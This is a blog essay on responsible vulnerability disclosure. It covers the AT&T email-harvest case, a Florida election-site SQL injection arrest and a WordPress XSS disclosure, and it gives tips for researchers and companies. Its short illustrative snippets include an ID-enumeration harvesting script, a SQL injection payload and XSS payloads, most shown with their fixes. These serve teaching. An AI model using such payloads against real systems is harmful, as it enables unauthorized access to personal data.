The security community has a lot of perks: low unemployment, plenty of excitement, new challenges every day, and an endless supply of things to learn. However, not everyone likes what we do, and not everyone likes to listen to us. There are so many bugs out there that a large number of us like to find them in our spare time. But what do we do when we discover one? Do we exploit it and grab the loot? Feel happy with our discovery and move on to the next finding? Or send the details over to the owners? The responsible move is door number three.

Keep in mind that even if you are responsible and just trying to help, not everyone will be happy about you poking around their systems, and in some cases neither will the law. This presents a couple of challenges for both sides.

Disclosures Gone Wrong

Weev is a convicted researcher who is part of a group called Goatse Security. In 2010 they discovered a flaw in the AT&T website that allowed an attacker to harvest user data. In short, when an iPad or other device used the sign-up form, the device sent a unique identifier that the site used to auto-populate the user's data. By spoofing this request with other identifiers, an attacker could easily grab a user's information, in this case email addresses.
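
To make the mechanics concrete, here is a minimal sketch of that kind of identifier-enumeration flaw in Python. The endpoint, parameter name, and identifier format are hypothetical placeholders, not AT&T's actual API; the point is only that a guessable device identifier was the sole key to someone else's account data.

    # Minimal sketch of an identifier-enumeration flaw like the one described above.
    # The endpoint, parameter name, and identifier format are hypothetical placeholders.
    import requests

    BASE_URL = "https://example-carrier.com/signup/prefill"  # hypothetical endpoint

    def probe(device_id):
        """Ask the sign-up form to prefill account data for a given device identifier."""
        resp = requests.get(
            BASE_URL,
            params={"device_id": device_id},              # spoofed identifier
            headers={"User-Agent": "Mobile-Device/1.0"},  # pretend to be the device
            timeout=10,
        )
        # A vulnerable endpoint hands back the account email for any valid identifier,
        # with no authentication beyond the guessable ID itself.
        return resp.json().get("email") if resp.ok else None

    # Because the identifiers are predictable, walking a range of them
    # harvests one email address per valid ID.
    for i in range(1000, 1006):
        email = probe("DEV{:012d}".format(i))
        if email:
            print(email)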

At the time, one common practice was disclosure to the media with evidence proving the vulnerability. Gawker received the information and disclosed the issue to the world before AT&T was made aware of it. Soon enough the authorities got wind of it and eventually charged Weev with one count of conspiracy to access a computer without authorization and one count of fraud. He was sentenced in March of 2013 and then released in April of 2014 after the conviction was vacated.

It was a lengthy battle for Weev, and he spent a good amount of time in jail for letting people know that AT&T was improperly handling their data. In my opinion Weev made one big mistake: not informing AT&T about the issue first and giving them adequate time to remediate it. In essence you could compare this to noticing that the local bank keeps its back door unlocked and then shouting about it to the whole town. Someone malicious is bound to try to use it to their advantage.

Should he have gone to jail for his actions? I'm not so sure. He disclosed a flaw that exposed email addresses, which are easily accessible with a little digging through legal channels; this is not exactly private information in this day and age, and we all get plenty of spam already. However, the word is that he leaked EVERY email address stored in the AT&T database, and that sounds like a step too far: first for accessing all of that data, and second for leaking it to third parties.

Consumers have a right to know about a flaw and a potential compromise of their data, but these situations are delicate. Companies see it as an attack no matter how good your intentions are, so you have to be responsible about it.

There is also a more recent case that you can review here: David Levin discovered a SQL injection vulnerability in an elections website in Florida that allowed him to dump the tables. He was jailed for about six hours and then released on bail, but again it seems that David stepped a bit too far. Once he discovered the SQL injection he started going through the tables and then posted a YouTube video about it. You could argue that he had to check whether the passwords were hashed and had a responsibility to do so. Logging into the site with the admin credentials, though, was probably not a good idea….or posting it publicly before a fix. He did admit to getting a little carried away and seems to have learned from the experience. It did, however, create some press for his firm, so maybe it was a publicity stunt as well? This is something to ponder….
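
For readers who have not seen the bug class up close, the snippet below is a generic illustration of SQL injection and the usual fix, parameterized queries. It is not the election site's actual code, and the table and column names are invented for the example.

    # Generic illustration of SQL injection and its fix, not the election site's code.
    # The table and column names are made up for the example.
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'fakehash123')")

    supplied = "' OR '1'='1"  # attacker-controlled input from a web form

    # Vulnerable: the input is pasted straight into the SQL string, so the
    # injected OR clause makes the WHERE condition always true and dumps every row.
    rows = conn.execute(
        "SELECT username, password_hash FROM users "
        "WHERE username = '" + supplied + "'"
    ).fetchall()
    print("string-built query returned:", rows)

    # Fixed: a parameterized query treats the input as data, not as SQL.
    rows = conn.execute(
        "SELECT username, password_hash FROM users WHERE username = ?",
        (supplied,),
    ).fetchall()
    print("parameterized query returned:", rows)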

When Things Go Right

This is a tough one: you rarely read in the media about a disclosure that goes right, because it doesn't create the hits or headlines that an arrest does. It is also fairly uneventful, and nobody is yelling in excitement about a vulnerability being fixed. Still, there is a decent example in a WordPress issue discovered last year. David Dede discovered that any WordPress theme or plugin using the genericons package could be exploited through Cross Site Scripting.
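
The genericons issue was a DOM-based Cross Site Scripting bug in an example file shipped with the package. As a generic illustration of the bug class (not the genericons code itself), here is roughly what a reflected XSS and its fix look like in a minimal Python web handler, assuming Flask.

    # Generic illustration of the XSS bug class and its usual fix.
    # This is not the genericons code; that flaw was DOM-based XSS in a bundled example file.
    from html import escape
    from flask import Flask, request

    app = Flask(__name__)

    @app.route("/search")
    def search():
        query = request.args.get("q", "")
        # Vulnerable version (commented out): reflecting raw input means a link like
        # /search?q=<script>...</script> runs attacker script in the visitor's browser.
        # return "<p>Results for {}</p>".format(query)

        # Fixed version: escape user-supplied input before placing it in the page.
        return "<p>Results for {}</p>".format(escape(query))

    if __name__ == "__main__":
        app.run()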

David eventually announced it to the world, but not before quietly notifying hosting vendors and giving them the chance to fix it. WordPress itself was included in this and had a blog post out detailing the available patches. In this case David kept the information close to his chest, and only once the fixes were done did he go public with it. He gained the respect of the company and also got the exposure he wanted to promote himself.

That is responsible, coordinated disclosure; in some cases all it takes is remembering the responsible part. It puts the researcher in a positive light and makes others want to work with you going forward.

Progress

Not everyone is living in the stone age, and some governments are taking very proactive approaches to responsible vulnerability disclosure. The Dutch government has taken steps to outline responsible disclosure and what it entails. It does not completely absolve researchers from legal action, but it does set some good guidelines. You can read about it here; the TL;DR is that as long as a researcher does not go beyond what is necessary to prove a vulnerability, it should be deemed acceptable. Additionally, the researcher should report it directly to the company before any public disclosure. It isn't law, but it builds a framework we can work off of.

On top of this, a number of companies now exist that help researchers legally disclose issues, such as bugcrowd.com or openbugbounty.org. These companies team up with others to set up bug bounty programs, testing guidelines, and disclosure processes. Companies in general should really utilize these resources, as crowd-sourced pen testing can strengthen a security program.

To Do and Not To Do

Not everyone will agree with the next steps, and I know this is a hotly debated topic, but this is what I have seen work through my own experience.

Researcher – If you are on the disclosure side and sending an issue to a company, here are some tips to help with your work.

  • Remain anonymous. This can be accomplished by using a VPN, a generic email address, and other methods (there are a lot). It is important because even if you did everything legally, the initial disclosure could go badly, especially if the company does not have a bug bounty program in place.
  • Don’t break anything and try not to steal anything; this is a good way to land yourself in jail or worse. In some cases a test will break something or expose data and this can’t be helped. Keep it to yourself, and if you must share it as proof then only send it to the company.
  • If there is no bug bounty program, don’t ask for compensation until you have felt out the company. Starting off an email with “Hi i found a bug, i’ll give you the details if you pay me k thanks?” sounds more like blackmail to a company than anything else. Be respectful, and if you don’t see a bug bounty program listed then don’t push the subject. Most of the people receiving these reports are also security professionals and would happily send you something for your time if they can.
  • Do your due diligence and make the report easy to understand; a proof of concept and screenshots go a long way, and remediation guidance is a big plus! There are too many instances of people claiming to be a researcher and giving only generic proof or guidance. Identify the affected cookies, parameters, pages, forms, etc. (see the sketch after this list). They won’t take you seriously unless you can prove it; I know I won’t.
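
As an example of what “easy to understand” can mean in practice, here is a sketch of a minimal, reproducible proof of concept a researcher might attach to a report. The URL and the “bio” parameter are hypothetical placeholders, and a real report would pair something like this with the affected page, parameter, and a screenshot.

    # Sketch of a minimal, reproducible proof of concept to attach to a report.
    # The target URL and the "bio" parameter are hypothetical placeholders.
    import requests

    payload = "<script>alert('xss-poc')</script>"

    # Affected page:      https://example.com/profile
    # Affected parameter: bio (reflected in the response without encoding)
    resp = requests.get(
        "https://example.com/profile",
        params={"bio": payload},
        timeout=10,
    )

    # If the raw payload comes back in the response body, the parameter is
    # reflected unescaped and the issue is reproducible from this single request.
    print("payload reflected unescaped:", payload in resp.text)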

Company – Being on the receiving end of reports is tough as well, but it can be a valuable resource for your company.

  • Don’t kill the messenger. Your first reaction might be to get angry at this person who was testing your systems and found a weakness, but remember it is better for someone to report it to you than for you to get owned because of ignorance. Assume they are a good person just trying to help and review the results.
  • Do your own checks against what was reported; do not just take the researcher’s word for it. You want to be sure it is a valid issue before pushing it to the right teams. Also, as this is your company, you ultimately decide the amount of risk an issue presents.
  • If you can, please do thank the researcher, even if it is just a hall of fame entry or a t-shirt. They put some effort into doing this work, and everyone’s time is valuable. If you cannot reward them, then maybe consider implementing a bounty program; a hall of fame is easy to add!

If you want to get more involved with this type of work, there are many legal avenues. Keep it responsible, and remember you represent the community when you perform these tests.
